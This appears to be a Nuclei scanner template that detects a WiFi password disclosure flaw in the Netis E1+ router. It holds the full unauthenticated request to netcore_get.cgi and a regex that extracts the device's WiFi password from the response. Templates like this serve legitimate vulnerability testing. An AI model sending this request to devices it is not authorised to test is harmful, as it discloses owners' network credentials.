id: netis-info-leak

info:
  name: Netis E1+ V1.2.32533 - WiFi Password Disclosure
  author: gy741
  severity: high
  description: A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device.
  reference:
    - https://www.exploit-db.com/exploits/48384
    - https://www.netis-systems.com/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-200
  tags: netis,exposure,edb

requests:
  - raw:
      - |
        GET //netcore_get.cgi HTTP/1.1
        Host: {{Hostname}}
        Cookie: homeFirstShow=yes

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "rp_ap_password"
          - "rp_ap_ssid"
        part: body
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - "'rp_soon_password':'([A-Za-z0-9]+)'"

# Enhanced by cs 03/27/2023
